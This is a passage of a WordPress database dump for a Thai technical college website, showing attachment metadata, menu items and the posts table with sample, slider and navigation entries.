(30889, 12891, '_thumbnail_id', '12892'),
(30892, 12891, '_hide_featured', NULL),
(30905, 12891, '_wp_trash_meta_status', 'publish'),
(30906, 12891, '_wp_trash_meta_time', '1650462243'),
(30907, 12891, '_wp_desired_post_slug', '12891-2'),
(30908, 12897, '_edit_lock', '1650462429:12'),
(30909, 12897, '_edit_last', '12'),
(30910, 12898, '_wp_attached_file', '2022/04/278343216_1592201581156024_242475338197918665_n.jpg'),
(30911, 12898, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1150;s:4:\"file\";s:59:\"2022/04/278343216_1592201581156024_242475338197918665_n.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"278343216_1592201581156024_242475338197918665_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"278343216_1592201581156024_242475338197918665_n-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"278343216_1592201581156024_242475338197918665_n-768x431.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:431;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"278343216_1592201581156024_242475338197918665_n-1024x575.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:575;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"278343216_1592201581156024_242475338197918665_n-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30912, 12897, '_thumbnail_id', '12898'),
(30915, 12897, '_hide_featured', NULL),
(30918, 12900, '_edit_lock', '1650645395:12'),
(30919, 12900, '_edit_last', '12'),
(30920, 12901, '_wp_attached_file', '2022/04/น4.jpg'),
(30921, 12901, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1500;s:4:\"file\";s:16:\"2022/04/น4.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"น4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"น4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"น4-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"น4-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:16:\"น4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30922, 12902, '_wp_attached_file', '2022/04/น3.jpg'),
(30923, 12902, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1448;s:4:\"file\";s:16:\"2022/04/น3.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"น3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"น3-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"น3-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:17:\"น3-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:16:\"น3-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30924, 12903, '_wp_attached_file', '2022/04/น2.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(30925, 12903, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1448;s:4:\"file\";s:16:\"2022/04/น2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"น2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"น2-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"น2-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:17:\"น2-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:16:\"น2-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30926, 12904, '_wp_attached_file', '2022/04/น1.jpg'),
(30927, 12904, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1523;s:6:\"height\";i:1077;s:4:\"file\";s:16:\"2022/04/น1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"น1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"น1-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"น1-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:17:\"น1-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:16:\"น1-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30928, 12900, '_thumbnail_id', '12904'),
(30931, 12900, '_hide_featured', NULL),
(30968, 12910, '_edit_lock', '1650848796:14'),
(30969, 12910, '_edit_last', '14'),
(30970, 12911, '_wp_attached_file', '2022/04/ประกาศกำหนดลงทะเบียน.pdf'),
(30971, 12912, '_wp_attached_file', '2022/04/ขั้นตอนพิมพ์บัตรลงทะเบียน.pdf'),
(30974, 12910, '_hide_featured', NULL),
(30979, 12914, '_wp_attached_file', '2021/12/5.png'),
(30980, 12914, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:709;s:4:\"file\";s:13:\"2021/12/5.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"5-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:12:\"5-300x86.png\";s:5:\"width\";i:300;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"5-768x220.png\";s:5:\"width\";i:768;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"5-1024x293.png\";s:5:\"width\";i:1024;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"5-400x114.png\";s:5:\"width\";i:400;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30987, 12918, '_edit_lock', '1650941897:14'),
(30988, 12918, '_edit_last', '14'),
(30989, 12919, '_wp_attached_file', '2022/04/ประกาศเปิด-ปิด1-65.pdf'),
(30992, 12918, '_hide_featured', NULL),
(30995, 12921, '_wp_attached_file', '2021/12/เปิดปิดเรียน-1-65.jpg'),
(30996, 12921, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:1181;s:4:\"file\";s:53:\"2021/12/เปิดปิดเรียน-1-65.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:53:\"เปิดปิดเรียน-1-65-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:53:\"เปิดปิดเรียน-1-65-300x143.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:143;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:53:\"เปิดปิดเรียน-1-65-768x366.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:366;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:54:\"เปิดปิดเรียน-1-65-1024x488.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:488;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:53:\"เปิดปิดเรียน-1-65-400x190.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30997, 12924, '_edit_lock', '1650961984:14'),
(30998, 12924, '_edit_last', '14'),
(31001, 12924, '_hide_featured', NULL),
(31006, 12926, '_wp_attached_file', '2021/12/6.png'),
(31007, 12926, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:709;s:4:\"file\";s:13:\"2021/12/6.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"6-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:12:\"6-300x86.png\";s:5:\"width\";i:300;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"6-768x220.png\";s:5:\"width\";i:768;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"6-1024x293.png\";s:5:\"width\";i:1024;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"6-400x114.png\";s:5:\"width\";i:400;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(31008, 12928, '_edit_lock', '1651035639:14'),
(31009, 12929, '_edit_lock', '1651051910:14'),
(31010, 12929, '_edit_last', '14'),
(31011, 12930, '_wp_attached_file', '2022/04/080465-01.jpg'),
(31012, 12930, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:21:\"2022/04/080465-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"080465-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"080465-01-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"080465-01-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"080465-01-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"080465-01-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(31015, 12929, '_hide_featured', NULL),
(31020, 12929, '_thumbnail_id', '12930'),
(31025, 12932, '_edit_lock', '1651051450:14'),
(31034, 12936, '_edit_lock', '1651203705:14'),
(31035, 12938, '_edit_lock', '1651203775:14'),
(31036, 12940, '_edit_lock', '1651206154:14'),
(31037, 12940, '_edit_last', '14'),
(31038, 12942, '_edit_lock', '1651215522:14'),
(31039, 12942, '_edit_last', '12'),
(31040, 12940, '_hide_featured', NULL),
(31050, 12948, '_menu_item_type', 'custom'),
(31051, 12948, '_menu_item_menu_item_parent', '1141'),
(31052, 12948, '_menu_item_object_id', '12948'),
(31053, 12948, '_menu_item_object', 'custom'),
(31054, 12948, '_menu_item_target', ''),
(31055, 12948, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(31056, 12948, '_menu_item_xfn', ''),
(31057, 12948, '_menu_item_url', 'http://www.google.com');
-- --------------------------------------------------------
--
-- Table structure for table `wp_posts`
--
CREATE TABLE `wp_posts` (
`ID` bigint(20) UNSIGNED NOT NULL,
`post_author` bigint(20) UNSIGNED NOT NULL DEFAULT 0,
`post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_content` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
`post_title` text COLLATE utf8mb4_unicode_ci NOT NULL,
`post_excerpt` text COLLATE utf8mb4_unicode_ci NOT NULL,
`post_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'publish',
`comment_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
`ping_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
`post_password` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`post_name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`to_ping` text COLLATE utf8mb4_unicode_ci NOT NULL,
`pinged` text COLLATE utf8mb4_unicode_ci NOT NULL,
`post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_content_filtered` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
`post_parent` bigint(20) UNSIGNED NOT NULL DEFAULT 0,
`guid` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`menu_order` int(11) NOT NULL DEFAULT 0,
`post_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'post',
`post_mime_type` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`comment_count` bigint(20) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
--
-- Dumping data for table `wp_posts`
--
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2, 1, '2017-09-20 08:46:37', '2017-09-20 08:46:37', 'This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:\n\n<blockquote>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like piña coladas. (And gettin\' caught in the rain.)</blockquote>\n\n...or something like this:\n\n<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>\n\nAs a new WordPress user, you should go to <a href=\"http://35.197.140.243/wp-admin/\">your dashboard</a> to delete this page and create new pages for your content. Have fun!', 'Sample Page', '', 'publish', 'closed', 'open', '', 'sample-page', '', '', '2017-09-20 08:46:37', '2017-09-20 08:46:37', '', 0, 'http://35.197.140.243/?page_id=2', 0, 'page', '', 0),
(37, 1, '2017-11-21 06:28:18', '2017-11-21 06:28:18', '', 'หน้าหลัก', '', 'publish', 'closed', 'closed', '', 'home', '', '', '2022-04-29 12:30:30', '2022-04-29 05:30:30', '', 0, 'http://sim.technicrayong.ac.th/?p=37', 1, 'nav_menu_item', '', 0),
(38, 1, '2017-11-21 06:28:18', '2017-11-21 06:28:18', '', 'ฝ่ายวิชาการ', '', 'publish', 'closed', 'closed', '', 'kapook', '', '', '2022-04-29 12:30:33', '2022-04-29 05:30:33', '', 0, 'http://sim.technicrayong.ac.th/?p=38', 52, 'nav_menu_item', '', 0),
(135, 1, '2017-11-23 19:58:10', '2017-11-23 12:58:10', '', 'Slider-01', '', 'publish', 'closed', 'closed', '', 'slider-01', '', '', '2018-01-12 17:16:28', '2018-01-12 10:16:28', '', 0, 'http://sim.technicrayong.ac.th/?page_id=135', 0, 'page', '', 0),
(136, 1, '2017-11-23 19:58:10', '2017-11-23 12:58:10', '', 'Slider-01', '', 'inherit', 'closed', 'closed', '', '135-revision-v1', '', '', '2017-11-23 19:58:10', '2017-11-23 12:58:10', '', 135, 'http://sim.technicrayong.ac.th/?p=136', 0, 'revision', '', 0),
(140, 1, '2017-11-23 19:59:29', '2017-11-23 12:59:29', '', 'Slider-02', '', 'publish', 'closed', 'closed', '', 'slider-02', '', '', '2018-01-12 17:22:48', '2018-01-12 10:22:48', '', 0, 'http://sim.technicrayong.ac.th/?page_id=140', 0, 'page', '', 0),
(141, 1, '2017-11-23 19:59:29', '2017-11-23 12:59:29', '', 'Slider-02', '', 'inherit', 'closed', 'closed', '', '140-revision-v1', '', '', '2017-11-23 19:59:29', '2017-11-23 12:59:29', '', 140, 'http://sim.technicrayong.ac.th/?p=141', 0, 'revision', '', 0),
(144, 1, '2017-11-23 20:01:36', '2017-11-23 13:01:36', '', 'Slider-03', '', 'publish', 'closed', 'closed', '', 'slider-03', '', '', '2018-01-12 17:17:23', '2018-01-12 10:17:23', '', 0, 'http://sim.technicrayong.ac.th/?page_id=144', 0, 'page', '', 0),
(145, 1, '2017-11-23 20:01:36', '2017-11-23 13:01:36', '', 'Slider-03', '', 'inherit', 'closed', 'closed', '', '144-revision-v1', '', '', '2017-11-23 20:01:36', '2017-11-23 13:01:36', '', 144, 'http://sim.technicrayong.ac.th/?p=145', 0, 'revision', '', 0),
(146, 1, '2017-11-23 20:02:31', '2017-11-23 13:02:31', '', 'Slider-04', '', 'publish', 'closed', 'closed', '', 'slider-04', '', '', '2018-01-12 17:18:09', '2018-01-12 10:18:09', '', 0, 'http://sim.technicrayong.ac.th/?page_id=146', 0, 'page', '', 0),
(147, 1, '2017-11-23 20:02:31', '2017-11-23 13:02:31', '', 'Slider-04', '', 'inherit', 'closed', 'closed', '', '146-revision-v1', '', '', '2017-11-23 20:02:31', '2017-11-23 13:02:31', '', 146, 'http://sim.technicrayong.ac.th/?p=147', 0, 'revision', '', 0),
(151, 1, '2017-11-23 20:25:21', '2017-11-23 13:25:21', '', 'Slider-05', '', 'publish', 'closed', 'closed', '', 'slider-05', '', '', '2017-11-23 20:25:21', '2017-11-23 13:25:21', '', 0, 'http://sim.technicrayong.ac.th/?page_id=151', 0, 'page', '', 0),
(153, 1, '2017-11-23 20:25:21', '2017-11-23 13:25:21', '', 'Slider-05', '', 'inherit', 'closed', 'closed', '', '151-revision-v1', '', '', '2017-11-23 20:25:21', '2017-11-23 13:25:21', '', 151, 'http://sim.technicrayong.ac.th/?p=153', 0, 'revision', '', 0),
(160, 1, '2017-11-24 10:32:35', '2017-11-24 03:32:35', 'ไทย', '', '', 'publish', 'closed', 'closed', '', 'home', '', '', '2018-08-20 16:31:18', '2018-08-20 09:31:18', '', 0, 'http://sim.technicrayong.ac.th/?page_id=160', 0, 'page', '', 0),
(161, 1, '2017-11-24 10:32:35', '2017-11-24 03:32:35', '', 'Home', '', 'inherit', 'closed', 'closed', '', '160-revision-v1', '', '', '2017-11-24 10:32:35', '2017-11-24 03:32:35', '', 160, 'http://sim.technicrayong.ac.th/?p=161', 0, 'revision', '', 0),
(175, 1, '2017-11-24 11:02:44', '2017-11-24 04:02:44', '', '', '', 'inherit', 'closed', 'closed', '', '160-revision-v1', '', '', '2017-11-24 11:02:44', '2017-11-24 04:02:44', '', 160, 'http://sim.technicrayong.ac.th/?p=175', 0, 'revision', '', 0),
(202, 1, '2017-11-25 08:28:52', '2017-11-25 01:28:52', '<img class=\"aligncenter wp-image-200 size-full\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2017/11/23722276_502248840151309_807964144226045962_n.jpg\" alt=\"\" width=\"960\" height=\"644\" />', '', '', 'inherit', 'closed', 'closed', '', '160-revision-v1', '', '', '2017-11-25 08:28:52', '2017-11-25 01:28:52', '', 160, 'http://sim.technicrayong.ac.th/?p=202', 0, 'revision', '', 0),
(218, 1, '2018-01-05 10:51:04', '2018-01-05 03:51:04', '', '', '', 'inherit', 'closed', 'closed', '', '160-revision-v1', '', '', '2018-01-05 10:51:04', '2018-01-05 03:51:04', '', 160, 'http://sim.technicrayong.ac.th/?p=218', 0, 'revision', '', 0),
(225, 1, '2018-01-05 15:45:15', '2018-01-05 08:45:15', '', 'ฝ่ายแผนงานและความร่วมมือ', '', 'publish', 'closed', 'closed', '', '%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%87%e0%b8%b2%e0%b8%99-%e0%b8%af', '', '', '2022-04-29 12:30:33', '2022-04-29 05:30:33', '', 0, 'http://sim.technicrayong.ac.th/?p=225', 35, 'nav_menu_item', '', 0),
(226, 1, '2018-01-05 15:45:15', '2018-01-05 08:45:15', '', 'ฝ่ายบริหารทรัพยากร', '', 'publish', 'closed', 'closed', '', '%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%a3%e0%b8%b1%e0%b8%9e%e0%b8%a2%e0%b8%b2%e0%b8%81%e0%b8%a3', '', '', '2022-04-29 12:30:31', '2022-04-29 05:30:31', '', 0, 'http://sim.technicrayong.ac.th/?p=226', 24, 'nav_menu_item', '', 0),
(227, 1, '2018-01-05 15:45:15', '2018-01-05 08:45:15', '', 'ฝ่ายพัฒนากิจการนักเรียน นักศึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%b2%e0%b8%a3-%e0%b8%af', '', '', '2022-04-29 12:30:33', '2022-04-29 05:30:33', '', 0, 'http://sim.technicrayong.ac.th/?p=227', 43, 'nav_menu_item', '', 0),
(229, 1, '2018-01-05 15:49:07', '2018-01-05 08:49:07', '', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'publish', 'closed', 'closed', '', '%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b9%81%e0%b8%a5%e0%b8%b0', '', '', '2022-04-29 12:30:33', '2022-04-29 05:30:33', '', 0, 'http://sim.technicrayong.ac.th/?p=229', 36, 'nav_menu_item', '', 0),
